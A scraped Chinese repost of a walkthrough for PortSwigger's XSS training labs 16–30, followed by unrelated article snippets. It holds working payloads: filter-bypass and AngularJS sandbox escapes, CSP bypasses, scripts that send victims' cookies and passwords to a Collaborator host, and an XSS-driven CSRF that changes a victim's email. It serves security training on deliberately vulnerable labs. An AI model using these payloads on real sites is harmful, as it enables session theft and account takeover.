中国建行网站首页手机app开发培训

bicheng/2026/1/21 23:52:19/文章来源:
中国建行网站首页,手机app开发培训,珠海哪个网站制作公司好,东台建设局网站burp靶场–xss下篇【16-30】 https://portswigger.net/web-security/all-labs#cross-site-scripting 实验16#xff1a;允许使用一些 SVG 标记的反射型 XSS ### 实验要求#xff1a; 该实验室有一个简单的反射型 XSS漏洞。该网站阻止了常见标签#xff0c;但错过了一些 S…burp靶场–xss下篇【16-30】 https://portswigger.net/web-security/all-labs#cross-site-scripting 实验16允许使用一些 SVG 标记的反射型 XSS ### 实验要求 该实验室有一个简单的反射型 XSS漏洞。该网站阻止了常见标签但错过了一些 SVG 标签和事件。 要解决该实验室问题请执行调用该函数的跨站点脚本alert()攻击。### 实验操作 注入标准 XSS 负载例如img src1 onerroralert(1) 观察该有效负载被阻止。在接下来的几个步骤中我们将使用 Burp Intruder 来测试哪些标签和属性被阻止。 打开Burp的浏览器并使用实验室中的搜索功能。将生成的请求发送给 Burp Intruder。 在 Burp Intruder 的“位置”选项卡中单击“清除§”。 在请求模板中将搜索词的值替换为 将光标放在尖括号之间然后单击“添加§”两次以创建有效负载位置。搜索词的值现在应该是§§ 访问XSS 备忘单并单击“将标签复制到剪贴板”。 在 Burp Intruder 的“有效负载”选项卡中单击“粘贴”将标签列表粘贴到有效负载列表中。单击“开始攻击”。 攻击完成后查看结果。svg观察到所有有效负载都导致了 HTTP 400 响应但使用、animatetransform、title和标签的有效负载除外image它们收到了 200 响应。 返回 Burp Intruder 中的“位置”选项卡并将搜索词替换为svganimatetransform%201 将光标放在字符之前然后单击“添加§”两次以创建有效负载位置。搜索词的值现在应该是svganimatetransform%20§§1 访问XSS 备忘单并单击“将事件复制到剪贴板”。 在 Burp Intruder 的“有效负载”选项卡中单击“清除”以删除以前的有效负载。然后单击“粘贴”将属性列表粘贴到有效负载列表中。单击“开始攻击”。 攻击完成后查看结果。请注意除了导致 200 响应的有效负载之外所有有效负载onbegin都会导致 HTTP 400 响应。在浏览器中访问以下网址确认alert()函数被调用实验已解决https://YOUR-LAB-ID.web-security-academy.net/?search%22%3E%3Csvg%3E%3Canimatetransform%20onbeginalert(1)%3E查看输入输出 测试常用payload被阻止 搜索框测试 Fuzz支持的标签https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 返回 Burp Intruder 中的“位置”选项卡并将搜索词替换为 animatetransform%201 将光标放在字符之前然后单击“添加§”两次以创建有效负载位置。搜索词的值现在应该是 animatetransform%20§§1 访问XSS 备忘单并单击“将事件复制到剪贴板”。 在浏览器中访问以下网址确认alert()函数被调用实验已解决 https://YOUR-LAB-ID.web-security-academy.net/?search%22%3E%3Csvg%3E%3Canimatetransform%20onbeginalert(1)%3E 我的是 https://0aa50066031b5831809cd0a3006f00ee.h1-web-security-academy.net/?search%22%3E%3Csvg%3E%3Canimatetransform%20onbeginalert(1)%3E 实验17规范链接标签中反射的 XSS ### 实验要求 本实验在规范链接标记中反映用户输入并转义尖括号。要完成该实验请在主页上执行跨站点脚本alert攻击注入调用该函数的属性。为了帮助您利用漏洞您可以假设模拟用户将按下以下组合键ALTSHIFTX CTRLALTX AltX 请注意本实验的预期解决方案只能在 Chrome 中实现。### 实验操作 访问以下 URL替换YOUR-LAB-ID为您的实验室 IDhttps://YOUR-LAB-ID.web-security-academy.net/?%27accesskey%27x%27onclick%27alert(1) 这会将X密钥设置为整个页面的访问密钥。当用户按下访问键时alert将调用该函数。要对自己触发漏洞利用请按以下组合键之一 在 Windows 上ALTSHIFTX 在 MacOS 上CTRLALTX 在 Linux 上AltX浏览器访问https://0a51005504cd9d4e8197896b007a00de.web-security-academy.net/?%27accesskey%27x%27οnclick%27alert(1) 实验18将 XSS 反射到 JavaScript 字符串中并转义单引号和反斜杠 ### 实验要求 该实验室在搜索查询跟踪功能中包含反映的跨站点脚本漏洞。反射发生在单引号和反斜杠转义的 JavaScript 字符串内。 要完成此实验请执行跨站点脚本攻击突破 JavaScript 字符串并调用该alert函数。### 实验要求 在搜索框中提交随机字母数字字符串然后使用 Burp Suite 拦截搜索请求并将其发送到 Burp Repeater。 观察随机字符串已反映在 JavaScript 字符串中。 尝试发送有效负载testpayload并观察您的单引号被反斜杠转义从而防止您打破字符串。 将您的输入替换为以下有效负载以突破脚本块并注入新脚本/scriptscriptalert(1)/script 通过右键单击、选择“复制 URL”并将 URL 粘贴到浏览器中来验证该技术是否有效。当您加载页面时它应该触发警报。实验19将 XSS 反射到带有尖括号和双引号的 JavaScript 字符串中 HTML 编码和单引号转义 ### 实验要求 该实验室在搜索查询跟踪功能中包含一个反映的跨站点脚本漏洞其中尖括号和双引号是 HTML 编码的单引号被转义。 要完成此实验请执行跨站点脚本攻击突破 JavaScript 字符串并调用该alert函数。### 实验操作 在搜索框中提交随机字母数字字符串然后使用 Burp Suite 拦截搜索请求并将其发送到 Burp Repeater。 观察随机字符串已反映在 JavaScript 字符串中。 尝试发送有效负载testpayload并观察您的单引号被反斜杠转义从而防止您打破字符串。 尝试发送有效负载test\payload并观察您的反斜杠没有被转义。 将您的输入替换为以下有效负载以打破 JavaScript 字符串并注入警报 \-alert(1)// 通过右键单击、选择“复制 URL”并将 URL 粘贴到浏览器中来验证该技术是否有效。当您加载页面时它应该触发警报。 实验20使用尖括号和双引号将 XSS 存储到onclick事件中 HTML 编码并转义单引号和反斜杠 ### 实验要求 该实验在评论功能中包含一个存储的跨站点脚本漏洞。 要完成此实验请提交一条评论该评论将alert在单击评论作者姓名时调用该函数。### 实验操作 在“网站”输入中发布带有随机字母数字字符串的评论然后使用 Burp Suite 拦截请求并将其发送到 Burp Repeater。 在浏览器中发出第二个请求以查看帖子并使用 Burp Suite 拦截该请求并将其发送到 Burp Repeater。 观察第二个 Repeater 选项卡中的随机字符串已反映在onclick事件处理程序属性内。 再次重复该过程但这次修改您的输入以注入调用 的 JavaScript URL alert使用以下有效负载 http://foo?apos;-alert(1)-apos; 通过右键单击、选择“复制 URL”并将 URL 粘贴到浏览器中来验证该技术是否有效。单击评论上方的名称应该会触发警报。发布评论查看评论 测试过滤 插入恶意js:注意重放器中提交恶意js实验失败符号被html编码: 直接使用浏览器提交恶意js: 实验21将 XSS 反射到带有尖括号、单引号、双引号、反斜杠和反引号的模板文字中 Unicode 转义 实验22利用跨站点脚本窃取 cookie ### 实验要求 本实验在博客评论功能中包含一个存储型 XSS 漏洞。模拟受害者用户在发布评论后查看所有评论。要解决该实验室问题请利用该漏洞窃取受害者的会话 cookie然后使用该 cookie 冒充受害者。### 实验操作 使用 Burp Suite Professional转到“协作者”选项卡。 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。 在博客评论中提交以下有效负载并在指定位置插入您的 Burp Collaborator 子域script fetch(https://BURP-COLLABORATOR-SUBDOMAIN, { method: POST, mode: no-cors, body:document.cookie }); /script 此脚本将使查看评论的任何人向公共 Collaborator 服务器上的子域发出包含其 cookie 的 POST 请求。返回“协作者”选项卡然后单击“立即投票”。您应该看到 HTTP 交互。如果您没有看到列出的任何交互请等待几秒钟然后重试。 记下 POST 正文中受害者 cookie 的值。 重新加载博客主页面使用 Burp Proxy 或 Burp Repeater 将您自己的会话 cookie 替换为您在 Burp Collaborator 中捕获的会话 cookie。发送请求以解决实验室问题。为了证明您已成功劫持管理员用户的会话您可以在请求中使用相同的 cookie 来/my-account加载管理员用户的帐户页面。 替代解决方案 或者您可以调整攻击通过利用 XSS 执行 CSRF来使受害者在博客评论中发布其会话 cookie 。然而这远没有那么微妙因为它公开暴露了 cookie并且还公开了执行攻击的证据。secretj6QrPgsSKullI388Ifkwe2W975FISQjd; session5HEJcBcF8kpfb9Xtb0l6N8REecKh85yQ 实验23利用跨站点脚本捕获密码 ### 实验要求 本实验在博客评论功能中包含一个存储型 XSS 漏洞。模拟受害者用户在发布评论后查看所有评论。要解决该实验室问题请利用该漏洞窃取受害者的用户名和密码然后使用这些凭据登录受害者的帐户。### 实验说明 使用 Burp Suite Professional转到“协作者”选项卡。 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。 在博客评论中提交以下有效负载并在指定位置插入您的 Burp Collaborator 子域input nameusername idusername input typepassword namepassword onchangeif(this.value.length)fetch(https://BURP-COLLABORATOR-SUBDOMAIN,{ method:POST, mode: no-cors, body:username.value:this.value }); 此脚本将使查看评论的任何人向您的公共 Collaborator 服务器的子域发出包含其用户名和密码的 POST 请求。返回“协作者”选项卡然后单击“立即投票”。您应该看到 HTTP 交互。如果您没有看到列出的任何交互请等待几秒钟然后重试。 记下 POST 正文中受害者的用户名和密码的值。 使用凭据以受害者用户身份登录。 替代解决方案 或者您可以调整攻击通过利用 XSS 执行 CSRF来使受害者在博客评论中发布其凭据。然而这远没有那么微妙因为它公开暴露了用户名和密码并且还公开了执行攻击的证据。评论处提交恶意js: 实验24利用XSS进行CSRF ### 实验要求 本实验在博客评论功能中包含一个存储型 XSS 漏洞。要解决该实验室问题请利用该漏洞执行 CSRF 攻击并更改查看博客文章评论的人员的电子邮件地址。 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 使用提供的凭据登录。在您的用户帐户页面上请注意更新电子邮件地址的功能。 如果您查看该页面的源代码您将看到以下信息 您需要向 发出 POST 请求/my-account/change-email并使用名为 的参数email。 在名为 的隐藏输入中有一个反 CSRF 令牌token。 这意味着您的利用需要加载用户帐户页面提取 CSRF 令牌然后使用该令牌更改受害者的电子邮件地址。 在博客评论中提交以下有效负载script var req new XMLHttpRequest(); req.onload handleResponse; req.open(get,/my-account,true); req.send(); function handleResponse() {var token this.responseText.match(/namecsrf value(\w)/)[1];var changeReq new XMLHttpRequest();changeReq.open(post, /my-account/change-email, true);changeReq.send(csrftokenemailtesttest.com) }; /script 这将使查看评论的任何人发出 POST 请求将其电子邮件地址更改为testtest.com。构造XSS 攻击需要加载用户帐户页面提取CSRF令牌然后使用该令牌更改受害者的电子邮件地址 查看博客评论查看的受害者的邮箱被修改 实验25使用 AngularJS 沙箱转义不带字符串反射 XSS ### 实验要求 本实验以一种不寻常的方式使用 AngularJS其中该$eval函数不可用并且您将无法在 AngularJS 中使用任何字符串。 要解决该实验室问题请执行跨站点脚本攻击该攻击可以逃脱沙箱并alert在不使用该$eval函数的情况下执行该函数。### 实验操作 访问以下 URL替换YOUR-LAB-ID为您的实验室 IDhttps://YOUR-LAB-ID.web-security-academy.net/?search1toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)1 该漏洞用于toString()创建一个不使用引号的字符串。然后它获取String原型并覆盖charAt每个字符串的函数。这有效地破坏了 AngularJS 沙箱。接下来将一个数组传递给orderBy过滤器。toString()然后我们再次使用创建字符串和构造函数属性来设置过滤器的参数String。最后我们使用该fromCharCode方法通过将字符代码转换为字符串来生成我们的有效负载xalert(1)。因为该charAt函数已被覆盖所以 AngularJS 将允许在通常不允许的情况下使用此代码。解决实验执行一个跨站点脚本攻击该攻击可以跳出沙箱并在不使用$eval函数的情况下执行alert函数 part1 payload 访问以下URL将YOUR-LAB-ID替换为您的实验室ID https://YOUR-LAB-ID.web-security-academy.net/?search1toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)1 我的是 https://0ad900d4034b4aad8215badb00560084.web-security-academy.net/?search1toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)1 原理 1、该漏洞利用使用toString()创建不使用引号的字符串。然后获取String原型并为每个字符串重写charAt函数。这有效地打破了AngularJS沙箱。 2、将数组传递给orderBy筛选器。 3、再次使用toString()创建一个字符串和String构造函数属性来设置过滤器的参数。 4、使用fromCharCode方法将字符代码转换为字符串xalert(1)从而生成有效负载。因为charAt函数已被覆盖AngularJS将允许此代码而通常不会允许此代码 实验26使用 AngularJS 沙箱逃逸和 CSP 反射 XSS ### 实验要求 本实验室使用 CSP 和 AngularJS。 要解决该实验室问题请执行跨站点脚本攻击绕过 CSP、逃离 AngularJS 沙箱并发出警报document.cookie。### 实验操作 转到漏洞利用服务器并粘贴以下代码替换YOUR-LAB-ID为您的实验室 IDscript locationhttps://YOUR-LAB-ID.web-security-academy.net/?search%3Cinput%20idx%20ng-focus$event.composedPath()|orderBy:%27(zalert)(document.cookie)%27%3E#x; /script 单击“存储”和“向受害者提供漏洞利用”。 该漏洞利用ng-focusAngularJS 中的事件来创建绕过 CSP 的焦点事件。它还使用$event它是引用事件对象的 AngularJS 变量。该path属性特定于 Chrome包含触发事件的元素数组。数组中的最后一个元素包含该window对象。通常|在 JavaScript 中是按位或运算但在 AngularJS 中它表示过滤操作在本例中是过滤orderBy器。冒号表示正在发送到过滤器的参数。在参数中alert我们没有直接调用函数而是将其分配给变量z。orderBy仅当操作到达数组window中的对象时才会调用该函数$event.path。这意味着它可以在窗口范围内调用而无需显式引用该window对象从而有效地绕过 AngularJS 的window检查。1、内容安全策略CSP绕过的工作方式与标准沙箱转义类似但通常涉及一些HTML注入。当CSP模式在AngularJS中处于活动状态时它以不同的方式解析模板表达式并避免使用Function构造函数。这意味着上面描述的标准沙箱转义将不再起作用。 2、根据特定的策略CSP将阻止JavaScript事件。但是AngularJS定义了自己的事件可以替代使用。在事件内部时AngularJS定义一个特殊的 $event对象该对象仅引用浏览器事件对象。可以使用此对象执行CSP绕过。在Chrome上有一个特殊的属性 $event/event 对象调用path。此属性包含导致事件执行的对象数组。最后一个属性始终是window对象我们可以使用它来执行沙箱转义。通过将此数组传递给orderBy过滤器我们可以枚举数组并使用最后一个元素window对象来执行全局函数例如alert()。 下面的代码演示了这一点 这里使用了from()函数它允许您将对象转换为数组并对该数组的每个元素调用给定函数在第二个参数中指定。在本例中调用alert()函数。不能直接调用函数因为AngularJS沙盒会解析代码并检测到window对象正被用于调用函数。相反使用 from()函数可以有效地隐藏沙箱中的window对象从而允许注入恶意代码 3、使用AngularJS沙箱转义绕过CSP 当使用了长度限制因此上面的向量将不起作用。需要考虑各种隐藏windowAngularJS沙盒中的对象。 执行此操作的一种方法是使用 array.map()功能如下 [1].map(alert) map()接受一个函数作为参数并为数组中的每一项调用该函数。这将绕过沙箱因为对alert()函数的引用没有显式引用窗口。尝试各种方法来执行alert()而不触发AngularJS的窗口检测 实验27事件处理程序和href属性被阻止的反射型 XSS ### 实验要求 该实验室包含一个反射型 XSS 漏洞带有一些白名单标签但所有事件和锚点href属性都被阻止。 要解决该实验室问题请执行跨站点脚本攻击注入一个向量单击该向量即可调用该alert函数。 请注意您需要使用“Click”一词来标记您的矢量以诱导模拟实验室用户单击您的矢量。例如 a hrefClick me/a### 实验操作 访问以下 URL替换YOUR-LAB-ID为您的实验室 IDhttps://YOUR-LAB-ID.web-security-academy.net/?search%3Csvg%3E%3Ca%3E%3CanimateattributeName%3Dhrefvalues%3Djavascript%3Aalert(1)%2F%3E%3Ctextx%3D20y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E实验28JavaScript URL 中反映了 XSS并阻止了某些字符 ### 实验要求 本实验反映了您在 JavaScript URL 中的输入但一切并不像看上去的那样。乍一看这似乎是一个微不足道的挑战但事实上这似乎是一个微不足道的挑战。但是该应用程序正在阻止某些字符以试图防止 XSS 攻击。要完成该实验请执行跨站点脚本攻击该攻击使用消息中某处包含的alert字符串调用该函数。 1337alert### 实验操作访问以下 URL替换YOUR-LAB-ID为您的实验室 IDhttps://YOUR-LAB-ID.web-security-academy.net/post?postId5%27},xx%3E{throw/**/onerroralert,1337},toStringx,window%2b%27%27,{x:%27 实验室将被解决但只有当您单击页面底部的“返回博客”时才会调用警报。该漏洞利用异常处理来调用alert带有参数的函数。使用该throw语句时用空白注释分隔以避免无空格限制。该alert函数被分配给onerror异常处理程序。由于throw是语句因此不能用作表达式。相反我们需要使用箭头函数创建一个块以便throw可以使用该语句。然后我们需要调用这个函数因此我们将它分配给 的toString属性window并通过强制 的字符串转换来触发它window。本实验反映了在JavaScript URL中的输入但并非一切都像看上去的那样。这最初看起来像是一个微不足道的挑战但应用程序阻止了一些字符试图防止XSS攻击 解决实验执行跨站点脚本攻击该攻击使用alert消息中某处包含的字符串1337调用alert函数 part1: payload 5‘},xx{throw/**/οnerrοralert,1337},toStringx,window’‘,{x:’ URL编码 5%27},xx%3E{throw/**/οnerrοralert,1337},toStringx,window%2b%27%27,{x:%27 利用漏洞攻击使用异常处理调用带有参数的alert函数。使用throw语句用一个空白注释分隔以绕过没有空格的限制。alert函数被分配给onerror异常处理程序。 由于throw是一个语句因此不能用作表达式。相反需要使用箭头函数来创建一个块以便可以使用throw语句。然后需要调用这个函数所以将它赋给window的toString属性并通过强制window进行字符串转换来触发它。 实验29反射型 XSS 受非常严格的 CSP 保护具有悬空标记攻击【略…】 ### 实验要求 本实验使用严格的 CSP阻止对外部网站的传出请求。 要解决该实验室问题首先执行跨站点脚本攻击绕过 CSP 并使用 Burp Collaborator 窃取模拟受害者用户的 CSRF 令牌。然后您需要将模拟用户的电子邮件地址更改为hackerevil-user.net。 您必须用“Click”一词标记您的矢量以诱导模拟用户单击它。例如 a hrefClick me/a 您可以使用以下凭据登录您自己的帐户wiener:peter### 实验操作 使用上面提供的帐户登录实验室。 检查更改电子邮件功能。观察参数中存在XSS漏洞email。 转到“协作者”选项卡。 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。 回到实验室转到漏洞利用服务器并添加以下代码分别将YOUR-LAB-ID和替换YOUR-EXPLOIT-SERVER-ID为您的实验室 ID 和漏洞利用服务器 ID并替换YOUR-COLLABORATOR-ID为您刚刚从 Burp Collaborator 复制的有效负载。script if(window.name) {new Image().src//BURP-COLLABORATOR-SUBDOMAIN?encodeURIComponent(window.name);} else {location https://YOUR-LAB-ID.web-security-academy.net/my-account?email%22%3E%3Ca%20href%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target%27; } /script 单击“存储”然后单击“向受害者提供漏洞利用”。当用户访问包含此恶意脚本的网站时如果他们在仍登录实验室网站的情况下单击“Click me”链接他们的浏览器将向您的恶意网站发送包含 CSRF 令牌的请求。然后您可以使用 Burp Collaborator 窃取此 CSRF 令牌。 返回“协作者”选项卡然后单击“立即投票”。如果您没有看到列出的任何交互请等待几秒钟然后重试。您应该看到由应用程序发起的 HTTP 交互。选择 HTTP 交互转到请求选项卡然后复制用户的 CSRF 令牌。 打开Burp的拦截功能后返回实验室的更改电子邮件功能并提交将电子邮件更改为任意随机地址的请求。 在Burp中转到拦截的请求并将email参数的值更改为hackerevil-user.net。 右键单击该请求然后从上下文菜单中选择“参与工具”然后选择“生成 CSRF PoC”。弹出窗口显示请求及其生成的 CSRF HTML。在请求中将 CSRF 令牌替换为您之前从受害者那里窃取的令牌。 单击“选项”并确保激活“包括自动提交脚本”。 单击“重新生成”更新 CSRF HTML使其包含被盗的令牌然后单击“复制 HTML”将其保存到剪贴板。 删除请求并关闭拦截功能。 返回漏洞利用服务器并将 CSRF HTML 粘贴到正文中。您可以覆盖我们之前输入的脚本。 单击“存储”和“向受害者提供漏洞利用”。用户的电子邮件将更改为hackerevil-user.net。第一步正常用登陆wiener:peter 将YOUR-LAB-ID和YOUR-EXPLOIT-SERVER-ID分别替换为实验室ID和漏洞利用服务器ID并将YOUR-COLABORATOR-ID替换为刚刚从Burp Collaborator复制的有效负载 我的是 提交代码到自己控制的服务器 单击存储然后单击向受害者发送利用漏洞攻击。当用户访问包含此恶意脚本的网站时如果他们在仍登录的情况下单击Click me链接其浏览器将向您的恶意网站发送包含其CSRF令牌的请求。然后可以使用Burp Collaborator客户端窃取这个CSRF令牌。 实验30反射型 XSS 受 CSP 保护具有 CSP 绕过功能【略…】 参考 ### burp官方xss payload: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet ### 【Burp系列】超全XSS跨站漏洞实验总结[上] https://mp.weixin.qq.com/s/mQuMaEZW90VWdE_kde85hw ### 【Burp系列】超全XSS跨站漏洞实验总结[下] https://mp.weixin.qq.com/s/Ouh2JL9F659U0p6HuLHS_g ### burp官方 https://portswigger.net/web-security/cross-site-scripting ### owasp xss: ### 跨站请求伪造 https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery ### 反射型跨站请求伪造 https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting ### 存储型跨站请求伪造 https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting ### DOM型 https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting ### 跨站脚本包含 https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/13-Testing_for_Cross_Site_Script_Inclusion ### Cross Site Flashing https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing ### payloadsallthings xss: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection### xss src挖掘 https://mhtsec.com/index.php/archives/24/ https://zhuanlan.zhihu.com/p/22674164 https://websec.readthedocs.io/zh/latest/vuln/xss/index.html https://_thorns.gitbooks.io/sec/content/yi_ci_zhen_dui_cun_chu_xing_xss_de_fuzzing.html## xss bypass https://wooyun.js.org/drops/Bypass%20xss%E8%BF%87%E6%BB%A4%E7%9A%84%E6%B5%8B%E8%AF%95%E6%96%B9%E6%B3%95.html https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/88032.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

利用ps制作网站的设计模板网站有哪几类

今天给大家带来几道面试题! 实现一个函数,可以左旋字符串中的k个字符。 例如: ABCD左旋一个字符得到BCDA ABCD左旋两个字符得到CDAB 我们可以先自己自行思考,下面是参考答案: 方法一: #define _CRT_SEC…

出国做博士后网站html基本结构框架代码

哎......被投诉了 😭😭😭😭😭 其实也不是小编不更,这不是期末了吗(zhaojiekou~~),而且最近学的信息收集和ctf感觉好像没找到啥能更的(不过最经还是在考虑更一…

怎样做 网站做seoasp网页制作

目录 一、首先引入依赖 二、然后封装一个VO 三、Controller层 四、Service实现类 引用样式 自适应列宽 自适应行高 五、测试 postman ​编辑 浏览器 异常 分配到这个任务了,写个小demo记录下,具体可参考EasyExcel官方文档 我用的是web上传…

标书制作公司网站触屏网站开发

#暑假到了,作为可能是最后一个快乐的暑假,我打算学点技能来傍身,首先,开始PS之旅 这个帖子作为我跟着B站up主学习PS的记录吧,希望我可以坚持下去! 学习的链接在这里:A02-PS软件安装&#xff0…

深圳建设资源交易服务中心网站网站开发公司组织架构

NodeJS 作为后端,仅在需要时调用 Python 在某些特殊的场景下,比如复杂耗时的数据处理和运算时,我们可以用 Python 脚本编写,然后使用 Node 的子进程调用 Python 脚本即可,这样可以提升效率。如下代码,我们…

网站建设怎么赚钱做外贸电商网站有哪个

Gitlab添加钩子 测试钩子 添加完成后,下面会出现钩子选择。点击test中的,push event。 出现successful,既添加成功。 如果添加失败,报错,更改Network

网站锚文本与标签专门做同人h的网站

AI Agnt是什么 AI代理(AI Agent)是指一种利用人工智能技术来执行特定任务或解决特定问题的自主软件程序。这些代理通过学习和模拟人类行为或特定领域的知识,能够在无需人为干预的情况下完成复杂的任务。AI代理广泛应用于多个领域&#xff0c…

深圳涂料网站建设平面设计哪个网站素材好

全文链接:http://tecdat.cn/?p32496 人口流动与迁移,作为人类产生以来就存在的一种社会现象,伴随着人类文明的不断进步从未间断(点击文末“阅读原文”获取完整代码数据)。 相关视频 人力资源是社会文明进步、人民富裕…

在深圳帮人做网站做网站的公司都有哪些岗位

概述 近期一直在负责es这块,就想着和大家分享一些使用经验,我们从存储、查询、优化、备份、运维等几个方面来做分享。今天咱们先看下如何更加合理的存储数据。 初见索引模板 记得刚接触es还是18年那会,项目上线后因一些原因导致日志这部分的…

自己做的网站怎么传到空间啊电商网站开发文档

银河麒麟v10 二进制安装包 安装mysql 8.35 1、卸载mariadb2、下载Mysql安装包3、安装Mysql 8.353.1、安装依赖包3.2、安装Mysql3.3、安装后配置 1、卸载mariadb 由于银河麒麟v10系统默认安装了mariadb 会与Mysql相冲突,因此首先需要卸载系统自带的mariadb 查看系统…

承德企业网站建设wordpress文章美观

目录 1.前言 2.本地安装和设置SQL Server 2.1 SQL Server下载 2.2 SQL Server本地连接测试 2.3 Cpolar内网穿透的下载和安装 2.3 Cpolar内网穿透的注册 3.本地网页发布 3.1 Cpolar云端设置 3.2 Cpolar本地设置 4.公网访问测试 5.结语 1.前言 数据库的重要性相信大家…

智能化建设网站深圳网站建设公司 概况

目录 前言: 一、什么是线程 (一)基本概念 (二)线程理解 (三)线程与进程的关系 (四)简单实用线程 (五)重谈虚拟地址空间 1. 页表的大小 2…

茂名免费自助建站模板网站域名查询ip地址

链接:http://www.cnblogs.com/BeyondAnyTime/archive/2012/05/23/2514964.html

网站开发成本预算吴川市建设工程公司网站

Title 题目 Improved breast cancer histological grading using deep learning 使用深度学习改善乳腺癌组织学分级 01 文献速递介绍 乳腺癌组织学分级是乳腺癌中一个确立的临床变量,它包括来自三个方面的信息,即小管形成程度、核多态性和有丝分裂计…

邢台营销型网站制作邢台邯郸做网站

📝前言: 这篇文章主要讲解一下条件判断语句if和循环语句while,for在python中需要注意的地方。 建议已有一定了解(对语句的执行逻辑清楚)的读者观看,如果对条件判断和循环的执行逻辑不太清楚,也可…

手机网站域名哪里注册番禺品牌型网站

对象的克隆 1、克隆即复制的意思,对象的克隆,意味着生成一个对象,这个对象和某个对象的属性和行为是一致的,但是这个对象和源对象是两个不同的对象。实现对象的克隆,方法是实现Cloneable接口,否则会报异常C…

网站销售流程邹平建设局网站

实现的基本功能: 登录时,需要输入姓名,然后选择作为管理者还是普通用户。选择成功后选择想要实现的功能。管理者的目录下方有有五个功能,而普通用户有4个功能,如下图 首先我们要建立Book这个类,里面包含书…

哪个通讯公司的网络好合肥优化营商环境

LOGO是一个网站的形象代表或者说是品牌的象征,用户记住了网站LOGO,就相当于记住了网站,因此,自己建网站时要融入网站LOGO的设计,潜移默化地把LOGO形象植入用户脑海中,把网站与LOGO紧密连接在一起&#xff0…

做公司的网站大概多少钱湖南省建设厅纪检组长

基于Spring Boot的夕阳红公寓管理系统的设计与实现 摘 要 如今社会上各行各业,都在用属于自己专用的软件来进行工作,互联网发展到这个时候,人们已经发现离不开了互联网。互联网的发展,离不开一些新的技术,而新技术的…

阿里云做企业网站西部数码网站管理助手 卸载

OpenFireOpenFire 是采用Java开发的基于XMPP(Jabber)协议,开源实时协作(RTC)服务器。Smack 是用 Java编 写的XMPP客户端代码库,是 spark 的核心开源界总是有许多有趣的东东,这三个合起来就是一个完整的XMPP IM 实现。OpenFire ——服务器端Sp…